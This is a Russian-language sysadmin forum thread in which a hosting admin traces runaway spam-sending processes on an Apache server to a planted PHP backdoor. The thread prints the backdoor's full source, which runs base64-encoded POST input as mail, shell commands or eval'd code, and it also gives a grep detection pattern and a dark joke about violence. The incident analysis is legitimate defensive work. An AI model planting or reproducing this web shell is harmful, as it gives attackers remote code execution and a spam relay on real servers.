apache  12865  1.4  0.6  9672  6040  ??  Rs   12:31AM   3:44.76 mail (perl5.8.8)
apache  16465  1.4  0.5  8604  4972  ??  Rs    1:03AM   1:43.25 mail (perl5.8.8)
apache  15130  1.3  0.5  8640  5000  ??  Rs   12:51AM   2:20.88 mail (perl5.8.8)
apache  18620  1.3  0.5  8056  5272  ??  Rs    1:29AM   0:45.05 mail (perl5.8.8)
apache  11583  1.3  0.6 11188  6200  ??  Rs   12:11AM   6:24.87 mail (perl5.8.8)
apache  11690  1.2  0.6 11184  6296  ??  Rs   12:13AM   5:53.31 mail (perl5.8.8)
apache  18108  1.2  0.5  8576  4904  ??  Ss    1:19AM   1:04.20 mail (perl5.8.8)
apache  18001  1.2  0.5  9028  5492  ??  Rs    1:17AM   1:09.65 mail (perl5.8.8)
apache  18619  1.2  0.5  8748  5320  ??  Rs    1:29AM   0:45.11 mail (perl5.8.8)
apache  19787  1.1  0.5  7528  4908  ??  Rs    1:53AM   0:04.68 mail (perl5.8.8)
apache  13189  1.1  0.6  9372  5972  ??  Rs   12:34AM   3:30.14 mail (perl5.8.8)
apache  19841  1.1  0.5  7256  4652  ??  Rs    1:55AM   0:03.30 mail (perl5.8.8)
apache  19708  1.1  0.5  8264  5036  ??  Rs    1:51AM   0:08.51 mail (perl5.8.8)
apache  11454  1.0  0.5  9964  5140  ??  Ss   12:09AM   5:15.31 mail (perl5.8.8)
apache  16977  1.0  0.5  8740  5548  ??  Rs    1:09AM   1:22.88 mail (perl5.8.8)
apache  17062  0.9  0.5  8528  5532  ??  Rs    1:10AM   1:23.40 mail (perl5.8.8)
apache  19707  0.8  0.5  7944  4860  ??  Rs    1:51AM   0:08.63 mail (perl5.8.8)
apache  16388  0.8  0.5  8588  4916  ??  Rs    1:03AM   1:44.78 mail (perl5.8.8)
apache  12493  0.8  0.5  9060  5044  ??  Rs   12:26AM   3:56.17 mail (perl5.8.8)
apache  11544  0.7  0.6 10516  6152  ??  Rs   12:11AM   6:05.17 mail (perl5.8.8)
apache  18350  0.6  0.5  8272  5368  ??  Rs    1:22AM   0:58.15 mail (perl5.8.8)
apache  18779  0.6  0.5  7992  5204  ??  Rs    1:31AM   0:40.52 mail (perl5.8.8)
root    19910  0.0  0.1  1540   872  p1  DL+   1:56AM   0:00.00 grep perl

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" +/–

Сообщение от universite (ok) on 22-Июл-11, 03:18

>>> Весь моцк сломал уже :(
>>> Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит
>>> ЦП на 100%.
>> ps -auxwww | grep perl
> [root@da /home/koshak]# ps -auxwww | grep perl
> apache  16011  2.2  0.5  8928  5508
> ??  Rs    1:00AM   1:51.32 mail
> (perl5.8.8)
> apache  14197  2.1  0.5  8940  4944
> ??  Rs   12:44AM   2:50.67 mail (perl5.8.8)
тогда выключаем mod_cgi и mod_perl (если есть) в Апаче
sockstat | grep -v :25
и вылавливайте ip атакующего
потом копаетесь в логах апача и ищите по этому ip запросы.
Если к обеду не справитесь, в личку стукнитесь.

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" +/–

Сообщение от kkoshakk (ok) on 22-Июл-11, 04:00

>[оверквотинг удален]
>> apache  16011  2.2  0.5  8928  5508
>> ??  Rs    1:00AM   1:51.32 mail
>> (perl5.8.8)
>> apache  14197  2.1  0.5  8940  4944
>> ??  Rs   12:44AM   2:50.67 mail (perl5.8.8)
> тогда выключаем mod_cgi и mod_perl (если есть) в Апаче
> sockstat | grep -v :25
> и вылавливайте ip атакующего
> потом копаетесь в логах апача и ищите по этому ip запросы.
> Если к обеду не справитесь, в личку стукнитесь.
mod_cgi и mod_perl не включены
вот конфиг сборки апача:
        "--prefix=/etc/httpd" \
        "--exec-prefix=/etc/httpd" \
        "--bindir=/usr/bin" \
        "--sbindir=/usr/sbin" \
        "--sysconfdir=/etc/httpd/conf" \
        "--enable-so" \
        "--enable-dav" \
        "--enable-dav-fs" \
        "--enable-dav-lock" \
        "--enable-suexec" \
        "--enable-deflate" \
        "--enable-unique-id" \
        "--with-suexec-caller=apache" \
        "--with-suexec-docroot=/" \
        "--with-suexec-gidmin=100" \
        "--with-suexec-logfile=/var/log/httpd/suexec_log" \
        "--with-suexec-uidmin=100" \
        "--with-suexec-userdir=public_html" \
        "--with-suexec-bin=/usr/sbin/suexec" \
        "--with-included-apr" \
        "--with-pcre=/usr/local" \
        "--includedir=/usr/include/apache" \
        "--libexecdir=/usr/lib/apache" \
        "--datadir=/var/www" \
        "--localstatedir=/var" \
        "--enable-logio" \
        "--enable-ssl" \
        "--enable-rewrite" \
        "--enable-proxy" \
        "--with-ssl=/usr" \
        "--enable-headers"
вот пхп:
        --with-apxs2 \
        --with-curl=/usr/local/lib \
        --with-gd \
        --enable-gd-native-ttf \
        --with-ttf \
        --with-gettext \
        --with-jpeg-dir=/usr/local/lib \
        --with-freetype-dir=/usr/local/lib \
        --with-kerberos \
        --with-openssl \
        --with-mcrypt \
        --with-mhash \
        --with-mysql=/usr/local/mysql \
        --with-mysqli=/usr/local/bin/mysql_config \
        --with-pdo-mysql=/usr/local/mysql \
        --with-pear \
        --with-png-dir=/usr/local/lib \
        --with-zlib \
        --with-zlib-dir=/usr/local/lib \
        --enable-zip \
        --with-iconv-dir=/usr/local/lib \
        --enable-bcmath \
        --enable-calendar \
        --enable-ftp \
        --enable-magic-quotes \
        --enable-sockets \
        --enable-mbstring \
        --with-libxml-dir=/usr/local \
        --with-xsl=/usr/local
вот парсинг конфига апача:
[root@da /etc/httpd/conf]# grep -r "mod_cgi" *
original/httpd.conf:    # socket used to communicate with the CGI daemon of mod_cgid.
[root@da /etc/httpd/conf]# grep -r "mod_perl" *
Пробую трафшоу, но запросов клиентских много...

Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" +/–

Сообщение от kkoshakk (ok) on 22-Июл-11, 04:13

Что могу сказать... найти получилось, спасибо...
Описываю как...
2 консоли, в 1 консоли трафшоу с фильтром port 80, в другой top -U apache с обновлением 1 сек
Когда появился нужный процесс, в трафшоу было следующее:
Source/32                 Destination/32            Protocol   Size       CPS
────────────────────────────────────────────────────────────────────────────────
193.39.118.30,80          66.249.72.237             6          32K        2441
8.23.224.110,80           193.39.118.30             6          8780       2973
193.39.118.30,80          124.128.233.130           6          2772       313
98.137.149.56,80          193.39.118.30             6          594
209.191.122.70,80         193.39.118.30             6          593
205.188.101.58,80         193.39.118.30             6          590
207.200.74.38,80          193.39.118.30             6          590
216.146.38.70,80          193.39.118.30             6          416
91.198.22.70,80           193.39.118.30             6          416
193.39.118.30,80          95.108.158.241            6          279
193.39.118.30             66.249.72.237             6          256        13
8.23.224.110              193.39.118.30             6          120        80
193.39.118.30             95.108.158.241            6          64
193.39.118.30             124.128.233.130           6          64
216.146.38.70             193.39.118.30             6          60
91.198.22.70              193.39.118.30             6          60
98.137.149.56             193.39.118.30             6          60
209.191.122.70            193.39.118.30             6          60
далее
[root@da /var/log/httpd]# grep -r "124.128.233.130" *
domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:02:07:01 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:02:37:45 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:03:03:41 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
domains/fortune-tools.com.log:124.128.233.130 - - [22/Jul/2011:00:44:55 +0300] "POST /inculcate.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
domains/fortune-tools.com.log:124.128.233.130 - - [22/Jul/2011:02:16:12 +0300] "GET /inculcate.php?m=0 HTTP/1.0" 200 423 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
[root@da /var/log/httpd]# cat /home/ftools/domains/fortune-tools.com/public_html/inculcate.php
<?php
error_reporting(0);header('Content-Type: text/html; charset=iso-8859-1');$r=30128+512;$m=$_GET['m'];if($m=='0'){echo($r);exit;}$m=$_POST['m'];if($m=='1'){if(mail(base64_decode($_POST['a']),base64_decode($_POST['b']),'',base64_decode($_POST['c']))){echo($r);}exit;}if($m=='2'){$m=proc_open(base64_decode($_POST['a']),array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('file','/dev/null','w')),$c);if(is_resource($m)){fwrite($c[0],base64_decode($_POST['b']));fclose($c[0]);while(!feof($c[1])){echo(fgets($c[1],1024));}}proc_close($m);exit;}if($m=='3'){$m=$_POST['a'];eval(base64_decode($m));exit;}
Как я понял, скрипт он забирал с 8.23.224.110,80, запускал и удалял.
С этим клиентом были проблемы пол года назад, похожий вирус, но скрипт заливал через фтп и запускал через веб его, ловить было легче...
Самый простой способ отлова вируса, думаю будет такой:
grep -r "base64_decode(\$_POST\['" * > danger &

И последние 2 вопроса:
1. Где недорого купить бензопилу?
2. На сколько частей надо разделить тело, чтобы удобно было в мешки упаковывать? :)
Пойду руки ему поотрываю

P.S. Какие есть мысли, как защититься от этого? Ато опять придется чиститься со спам-баз

Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр"	+/–
Сообщение от universite (ok) on 22-Июл-11, 02:20
> Весь моцк сломал уже :( > Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит > ЦП на 100%. ps -auxwww \| grep perl
Ответить \| Правка \| ^ к родителю #0 \| Наверх \| Cообщить модератору


	3. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр"	+/–
	Сообщение от universite (ok) on 22-Июл-11, 03:18
	>>> Весь моцк сломал уже :( >>> Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит >>> ЦП на 100%. >> ps -auxwww \| grep perl > [root@da /home/koshak]# ps -auxwww \| grep perl > apache 16011 2.2 0.5 8928 5508 > ?? Rs 1:00AM 1:51.32 mail > (perl5.8.8) > apache 14197 2.1 0.5 8940 4944 > ?? Rs 12:44AM 2:50.67 mail (perl5.8.8) тогда выключаем mod_cgi и mod_perl (если есть) в Апаче sockstat \| grep -v :25 и вылавливайте ip атакующего потом копаетесь в логах апача и ищите по этому ip запросы. Если к обеду не справитесь, в личку стукнитесь.
	Ответить \| Правка \| ^ к родителю #2 \| Наверх \| Cообщить модератору


	4. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр"	+/–
	Сообщение от kkoshakk (ok) on 22-Июл-11, 04:00
	>[оверквотинг удален] >> apache 16011 2.2 0.5 8928 5508 >> ?? Rs 1:00AM 1:51.32 mail >> (perl5.8.8) >> apache 14197 2.1 0.5 8940 4944 >> ?? Rs 12:44AM 2:50.67 mail (perl5.8.8) > тогда выключаем mod_cgi и mod_perl (если есть) в Апаче > sockstat \| grep -v :25 > и вылавливайте ip атакующего > потом копаетесь в логах апача и ищите по этому ip запросы. > Если к обеду не справитесь, в личку стукнитесь. mod_cgi и mod_perl не включены вот конфиг сборки апача: "--prefix=/etc/httpd" \ "--exec-prefix=/etc/httpd" \ "--bindir=/usr/bin" \ "--sbindir=/usr/sbin" \ "--sysconfdir=/etc/httpd/conf" \ "--enable-so" \ "--enable-dav" \ "--enable-dav-fs" \ "--enable-dav-lock" \ "--enable-suexec" \ "--enable-deflate" \ "--enable-unique-id" \ "--with-suexec-caller=apache" \ "--with-suexec-docroot=/" \ "--with-suexec-gidmin=100" \ "--with-suexec-logfile=/var/log/httpd/suexec_log" \ "--with-suexec-uidmin=100" \ "--with-suexec-userdir=public_html" \ "--with-suexec-bin=/usr/sbin/suexec" \ "--with-included-apr" \ "--with-pcre=/usr/local" \ "--includedir=/usr/include/apache" \ "--libexecdir=/usr/lib/apache" \ "--datadir=/var/www" \ "--localstatedir=/var" \ "--enable-logio" \ "--enable-ssl" \ "--enable-rewrite" \ "--enable-proxy" \ "--with-ssl=/usr" \ "--enable-headers" вот пхп: --with-apxs2 \ --with-curl=/usr/local/lib \ --with-gd \ --enable-gd-native-ttf \ --with-ttf \ --with-gettext \ --with-jpeg-dir=/usr/local/lib \ --with-freetype-dir=/usr/local/lib \ --with-kerberos \ --with-openssl \ --with-mcrypt \ --with-mhash \ --with-mysql=/usr/local/mysql \ --with-mysqli=/usr/local/bin/mysql_config \ --with-pdo-mysql=/usr/local/mysql \ --with-pear \ --with-png-dir=/usr/local/lib \ --with-zlib \ --with-zlib-dir=/usr/local/lib \ --enable-zip \ --with-iconv-dir=/usr/local/lib \ --enable-bcmath \ --enable-calendar \ --enable-ftp \ --enable-magic-quotes \ --enable-sockets \ --enable-mbstring \ --with-libxml-dir=/usr/local \ --with-xsl=/usr/local вот парсинг конфига апача: [root@da /etc/httpd/conf]# grep -r "mod_cgi" * original/httpd.conf: # socket used to communicate with the CGI daemon of mod_cgid. [root@da /etc/httpd/conf]# grep -r "mod_perl" * Пробую трафшоу, но запросов клиентских много...
	Ответить \| Правка \| ^ к родителю #3 \| Наверх \| Cообщить модератору


	5. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр"	+/–
	Сообщение от kkoshakk (ok) on 22-Июл-11, 04:13
	Что могу сказать... найти получилось, спасибо... Описываю как... 2 консоли, в 1 консоли трафшоу с фильтром port 80, в другой top -U apache с обновлением 1 сек Когда появился нужный процесс, в трафшоу было следующее: Source/32 Destination/32 Protocol Size CPS ──────────────────────────────────────────────────────────────────────────────── 193.39.118.30,80 66.249.72.237 6 32K 2441 8.23.224.110,80 193.39.118.30 6 8780 2973 193.39.118.30,80 124.128.233.130 6 2772 313 98.137.149.56,80 193.39.118.30 6 594 209.191.122.70,80 193.39.118.30 6 593 205.188.101.58,80 193.39.118.30 6 590 207.200.74.38,80 193.39.118.30 6 590 216.146.38.70,80 193.39.118.30 6 416 91.198.22.70,80 193.39.118.30 6 416 193.39.118.30,80 95.108.158.241 6 279 193.39.118.30 66.249.72.237 6 256 13 8.23.224.110 193.39.118.30 6 120 80 193.39.118.30 95.108.158.241 6 64 193.39.118.30 124.128.233.130 6 64 216.146.38.70 193.39.118.30 6 60 91.198.22.70 193.39.118.30 6 60 98.137.149.56 193.39.118.30 6 60 209.191.122.70 193.39.118.30 6 60 далее [root@da /var/log/httpd]# grep -r "124.128.233.130" * domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:02:07:01 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:02:37:45 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" domains/tzu.od.ua.log:124.128.233.130 - - [22/Jul/2011:03:03:41 +0300] "POST /participating.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" domains/fortune-tools.com.log:124.128.233.130 - - [22/Jul/2011:00:44:55 +0300] "POST /inculcate.php HTTP/1.0" 200 484 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" domains/fortune-tools.com.log:124.128.233.130 - - [22/Jul/2011:02:16:12 +0300] "GET /inculcate.php?m=0 HTTP/1.0" 200 423 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" [root@da /var/log/httpd]# cat /home/ftools/domains/fortune-tools.com/public_html/inculcate.php <?php error_reporting(0);header('Content-Type: text/html; charset=iso-8859-1');$r=30128+512;$m=$_GET['m'];if($m=='0'){echo($r);exit;}$m=$_POST['m'];if($m=='1'){if(mail(base64_decode($_POST['a']),base64_decode($_POST['b']),'',base64_decode($_POST['c']))){echo($r);}exit;}if($m=='2'){$m=proc_open(base64_decode($_POST['a']),array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('file','/dev/null','w')),$c);if(is_resource($m)){fwrite($c[0],base64_decode($_POST['b']));fclose($c[0]);while(!feof($c[1])){echo(fgets($c[1],1024));}}proc_close($m);exit;}if($m=='3'){$m=$_POST['a'];eval(base64_decode($m));exit;} Как я понял, скрипт он забирал с 8.23.224.110,80, запускал и удалял. С этим клиентом были проблемы пол года назад, похожий вирус, но скрипт заливал через фтп и запускал через веб его, ловить было легче... Самый простой способ отлова вируса, думаю будет такой: grep -r "base64_decode(\$_POST\['" * > danger & И последние 2 вопроса: 1. Где недорого купить бензопилу? 2. На сколько частей надо разделить тело, чтобы удобно было в мешки упаковывать? :) Пойду руки ему поотрываю P.S. Какие есть мысли, как защититься от этого? Ато опять придется чиститься со спам-баз
	Ответить \| Правка \| ^ к родителю #4 \| Наверх \| Cообщить модератору